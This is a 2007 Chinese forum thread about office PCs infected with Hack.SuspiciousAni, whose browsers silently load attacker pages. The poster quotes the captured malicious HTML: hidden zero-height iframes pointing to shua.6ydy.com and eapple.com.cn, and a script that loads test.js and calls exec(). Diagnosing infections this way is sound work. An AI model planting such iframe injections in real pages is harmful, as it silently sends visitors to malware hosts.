12   1  /  2  页   跳转

ie先访问其他网站,怎么办?

ie先访问其他网站,怎么办?

我们局用的是正版瑞星,现在出现这么一些问题:
1.  几乎每台机器都中了Hack.SuspiciousAni病毒,现在正在清理中,好像很难清除掉。
2. 几乎每台机器,ie每新开一个窗口,状态栏里闪烁这么一些网址:eapple.com.cn/bin/111.htm,shua.6ydy.com  ...几个网站,然后后退按钮下多了1~3个不等的,通常是2个"Hello!",我知道这是网页的title,也就是说它先要访问这几个网站,然后再跳转到要访问的页面。我查看了lmhosts文件,也没有这些记录。现在我不知道怎么弄了,请高手指教!
最后编辑2007-06-21 15:37:00
分享到:
gototop
 

http://zhidao.baidu.com/question/27130714.html
gototop
 

顶起,请大家帮帮忙了,急啊,谢了!
gototop
 

先用卡卡助手吧!
gototop
 

我用了卡卡的“ie及系统修复”功能,显示一切正常,不需要修复。现在是一打开卡卡或者360安全卫士,就弹出下面这样的窗口

附件附件:

下载次数:242
文件类型:image/pjpeg
文件大小:
上传时间:2007-6-21 14:36:29
描述:



gototop
 

去安全模式下试试  另外升级杀毒也是重要的操作
gototop
 

我把那个test.htm下下来了,代码如下:
<iframe src=http://shua.6ydy.com/aaa.htm width=50 height=0></iframe>                                                                                                                                        <head>
<title>test</title>
<script src="test.js"></script>
</head>
<script>
exec();
</script>
</body>

很显然是执行这个test.js文件,我也下了,可是这个文件不能打开,只要打开,或者复制,它就自动删除
gototop
 

对了,那个aaa.htm,我也下了,代码如下:
<iframe src=http://shua.6ydy.com/aaa.htm width=50 height=0></iframe>                                                                                                                                      <html>
<head>test</head>
</body>
<iframe src="http://eapple.com.cn/bin\112/index.htm" width=50 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1134674.js"></script>
<noscript><a href="http://www.51.la/?1134674" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/1134674.asp" style="border:none" /></a></noscript>
<script src='http://s110.cnzz.com/stat.php?id=527820&web_id=527820' language='JavaScript' charset='gb2312'></script>
</body>
</html>
gototop
 

ding
gototop
 

哈,原来那个hello就是从这个123.htm来的
<iframe src=http://shua.6ydy.com/aaa.htm width=50 height=0></iframe>                                                                                                                                        <html>
<head>
<title>Hello!</title>
<meta name="author" content="迷网" />
</head>
<body>
<script language="VBScript"></script>
<script type="text/jscript">
function init() {
document.write("The time is now: " + Date() );
}
window.onload = init;
</script>
</body>
<script src='http://s106.cnzz.com/stat.php?id=516857&web_id=516857' language='JavaScript' charset='gb2312'></script>
</html>
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT